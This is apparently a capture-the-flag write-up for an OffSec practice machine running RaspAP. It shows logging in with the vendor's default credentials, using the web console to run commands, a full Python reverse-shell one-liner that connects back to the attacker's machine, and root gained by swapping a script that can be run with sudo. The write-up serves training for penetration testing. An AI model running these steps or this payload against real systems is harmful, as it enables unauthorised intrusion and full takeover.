This box is rated as intermediate difficulty by OffSec and the community
First I start with nmap scan: nmap -T4 -A -v -p- 192.168.X.X — open -oN walla_scan. Lots of open ports so I decide to check out port 8091 first since our scan is shows it as an http service.
Once I visit port 8091 in my web browser I’m prompted to login.
I don’t know the password for this so I try admin/admin just to see if I can guess the user/pass. It doesn’t work so I look at the message the pop-up gives us which is “RaspAP”. Instantly my mind starts to think about what this could be so I google it and find out it’s an access point. Here’s their website if you want to know more about it: https://raspap.com/. As you can see below it’s advertised as a “full-featured wireless router” for debian devices.
Next thing I do is I check the documentation for RaspAP in order to find out the default username and password that is used during set up. On their website https://raspap.com/, after clicking on the “docs” link I see a screen shot of what I’m looking for.
Now we know the username and password is admin/secret. Trying this combination I log in successfully.
When ever I’m greeted with an application first thing I do is find out the version so I can see if there’s any exploits that match it. In this case RaspAP version 2.5 is running and there is an exploit for it. I quickly find one on github. POC: https://github.com/lb0x/cve-2020-24572. Initially the exploit won’t work but after changing the “%d” to “%s” it would run, but I don’t get a shell back. Looks like this is a rabbit hole. These are common in PG-Practice and on the OSCP labs/exam. It’s great practice to come across them, and come to the realization that you’re in one, so you can focus your attention else where.
Next I enumerate the dashboard and after visiting the “System” tab I see a console that allows us to run commands directly on the underlying OS the webapp is running on. Using this web console I check /etc/passwd to see which users are on the system.
After checking each users /home/ directory only Walters has anything of interest. Here we can get local.txt just from using the web console. But what we really need is a reverse shell on the target back to our kali machine.
I check if the RaspAP has python installed by running “which python” and sure enough python is installed. Combining this with our web console access a reverse shell is trivial.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.X.X”,8091));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
On our nc listener running on port 8091, we catch the reverse shell and we are running as www-data. I got to /home/walter/ and see local.txt and another file called “wifi_reset.py”.
This “wifi_reset.py” file is interesting because if we run “sudo -l” which is a common command to run when trying to privesc on a linux box we can see which commands we can run with root privs. In this case, we can run *alot* of commands as sudo. The only one that matters though is “(ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py” this means that “wifi_reset.py” can be run with sudo privileges. With my current shell I don’t have write access to it but we can upload files to the box using wget. So I create my own malicious “wifi_reset.py” file and upload it to the box in /home/walter/ directory.
A note on sudo. The “sudo” command lets you execute commands with superuser privileges as long as your user id is in the sudoers file, giving you the necessary authorization.
Originally I had tried uploading the malicious wifi_reset.py file with a python reverse shell payload but for some reason the box does not like any python reverse shells I tried and believe me I spent a good 20 minutes trouble shooting this part. But if we can’t get a shell what else can we do? Python has a module called “os”. That lets us run system commands. Now you can see where this is heading. Here’s our ‘evil’ wifi_reset.py file contents. It’s pretty simple, but effective.
See? All it does it spawn a bash shell. Now lets run our sudo command “sudo /usr/bin/python /home/walter/wifi_reset.py”.
We get root, proof.txt and this box is done.
